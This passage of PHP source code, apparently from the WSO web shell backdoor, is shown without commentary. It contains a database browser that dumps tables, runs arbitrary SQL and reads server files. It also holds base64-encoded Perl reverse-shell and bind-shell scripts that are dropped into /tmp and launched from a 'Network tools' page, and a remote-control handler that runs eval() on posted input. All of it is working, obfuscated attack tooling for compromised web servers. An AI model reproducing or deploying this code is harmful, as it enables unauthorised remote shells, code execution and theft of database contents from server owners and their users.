1509 header("Content-Disposition: attachment; filename=dump.sql");
1510 header("Content-Type: text/plain");
1511 foreach($_POST['tbl'] as $v) $db->dump($v);
1512 exit;
1513 }
1514 elseif ($fp = @fopen($_POST['file'], 'w'))
1515 {
1516 foreach($_POST['tbl'] as $v) $db->dump($v, $fp);
1517 fclose($fp);
1518 unset($_POST['p2']);
1519 }
1520 else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1521 }
1522
1523 wsoHeader();
1524 echo " <h1>Sql browser</h1><div class=content> <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'> <td><select name='type'><option value='mysql' ";
1525 if (@$_POST['type'] == 'mysql') echo 'selected';
1526 echo ">MySql</option><option value='pgsql' ";
1527 if (@$_POST['type'] == 'pgsql') echo 'selected';
1528 echo ">PostgreSql</option></select></td> <td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td> <td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td> <td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>";
1529 $tmp = "<input type=text name=sql_base value=''>";
1530 if (isset($_POST['sql_host']))
1531 {
1532 if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']))
1533 {
1534 switch ($_POST['charset'])
1535 {
1536 case "Windows-1251":
1537 $db->setCharset('cp1251');
1538 break;
1539
1540 case "UTF-8":
1541 $db->setCharset('utf8');
1542 break;
1543
1544 case "KOI8-R":
1545 $db->setCharset('koi8r');
1546 break;
1547
1548 case "KOI8-U":
1549 $db->setCharset('koi8u');
1550 break;
1551
1552 case "cp866":
1553 $db->setCharset('cp866');
1554 break;
1555 }
1556
1557 $db->listDbs();
1558 echo "<select name=sql_base><option value=''></option>";
1559 while ($item = $db->fetch())
1560 {
1561 list($key, $value) = each($item);
1562 echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
1563 }
1564
1565 echo '</select>';
1566 }
1567 else echo $tmp;
1568 }
1569 else echo $tmp;
1570 echo "</td> <td><input type=submit value='>>' onclick='fs(d.sf);'></td> <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td> </tr> </table> <script> s_db='" . @addslashes($_POST['sql_base']) . "'; function fs(f) { if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; if(f.p1) f.p1.value=''; if(f.p2) f.p2.value=''; if(f.p3) f.p3.value=''; } } function st(t,l) { d.sf.p1.value = 'select'; d.sf.p2.value = t; if(l && d.sf.p3) d.sf.p3.value = l; d.sf.submit(); } function is() { for(i=0;i<d.sf.elements['tbl[]'].length;++i) d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; } </script>";
1571 if (isset($db) && $db->link)
1572 {
1573 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1574 if (!empty($_POST['sql_base']))
1575 {
1576 $db->selectdb($_POST['sql_base']);
1577 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br /><br />";
1578 $tbls_res = $db->listTables();
1579 while ($item = $db->fetch($tbls_res))
1580 {
1581 list($key, $value) = each($item);
1582 if (!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
1583 $value = htmlspecialchars($value);
1584 echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br />";
1585 }
1586
1587 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br />File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1588 if (@$_POST['p1'] == 'select')
1589 {
1590 $_POST['p1'] = 'query';
1591 $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
1592 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1593 $num = $db->fetch();
1594 $pages = ceil($num['n'] / 30);
1595 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1596 echo " of $pages";
1597 if ($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>";
1598 if ($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>";
1599 $_POST['p3']--;
1600 if ($_POST['type'] == 'pgsql') $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30);
1601 else $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30';
1602 echo "<br /><br />";
1603 }
1604
1605 if ((@$_POST['p1'] == 'query') && !empty($_POST['p2']))
1606 {
1607 $db->query(@$_POST['p2']);
1608 if ($db->res !== false)
1609 {
1610 $title = false;
1611 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1612 $line = 1;
1613 while ($item = $db->fetch())
1614 {
1615 if (!$title)
1616 {
1617 echo '<tr>';
1618 foreach($item as $key => $value) echo '<th>' . $key . '</th>';
1619 reset($item);
1620 $title = true;
1621 echo '</tr><tr>';
1622 $line = 2;
1623 }
1624
1625 echo '<tr class="l' . $line . '">';
1626 $line = $line == 1 ? 2 : 1;
1627 foreach($item as $key => $value)
1628 {
1629 if ($value == null) echo '<td><i>null</i></td>';
1630 else echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
1631 }
1632
1633 echo '</tr>';
1634 }
1635
1636 echo '</table>';
1637 }
1638 else
1639 {
1640 echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
1641 }
1642 }
1643
1644 echo "<br /></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1645 if (!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']);
1646 echo "</textarea><br/><input type=submit value='Execute'>";
1647 echo "</td></tr>";
1648 }
1649
1650 echo "</table></form><br/>";
1651 if ($_POST['type'] == 'mysql')
1652 {
1653 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1654 if ($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1655 }
1656
1657 if (@$_POST['p1'] == 'loadfile')
1658 {
1659 $file = $db->loadFile($_POST['p2']);
1660 echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
1661 }
1662 }
1663 else
1664 {
1665 echo htmlspecialchars($db->error());
1666 }
1667
1668 echo '</div>';
1669 wsoFooter();
1670 }
1671
1672function actionNetwork()
1673 {
1674 wsoHeader();
1675 $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1676 $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1677 echo "<h1>Network tools</h1><div class=content> <form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\"> <span>Bind port to /bin/sh [perl]</span><br/> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> </form> <form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> <span>Back-connect [perl]</span><br/> Server: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'> </form><br />";
1678 if (isset($_POST['p1']))
1679 {
1680 function cf($f, $t)
1681 {
1682 $w = @fopen($f, "w") or @function_exists('file_put_contents');
1683 if ($w)
1684 {
1685 @fwrite($w, @base64_decode($t));
1686 @fclose($w);
1687 }
1688 }
1689
1690 if ($_POST['p1'] == 'bpp')
1691 {
1692 cf("/tmp/bp.pl", $bind_port_p);
1693 $out = wsoEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &");
1694 sleep(1);
1695 echo "<pre class=ml1>$out\n" . wsoEx("ps aux | grep bp.pl") . "</pre>";
1696 unlink("/tmp/bp.pl");
1697 }
1698
1699 if ($_POST['p1'] == 'bcp')
1700 {
1701 cf("/tmp/bc.pl", $back_connect_p);
1702 $out = wsoEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &");
1703 sleep(1);
1704 echo "<pre class=ml1>$out\n" . wsoEx("ps aux | grep bc.pl") . "</pre>";
1705 unlink("/tmp/bc.pl");
1706 }
1707 }
1708
1709 echo '</div>';
1710 wsoFooter();
1711 }
1712
1713function actionRC()
1714 {
1715 if (!@$_POST['p1'])
1716 {
1717 $a = array(
1718 "uname" => php_uname() ,
1719 "php_version" => phpversion() ,
1720 "wso_version" => WSO_VERSION,
1721 "safemode" => @ini_get('safe_mode')
1722 );
1723 echo serialize($a);
1724 }
1725 else
1726 {
1727 eval($_POST['p1']);
1728 }
1729 }
1730
1731if (empty($_POST['a']))
1732if (isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action;
1733 else $_POST['a'] = 'SecInfo';
1734
1735if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) call_user_func('action' . $_POST['a']);
1736exit;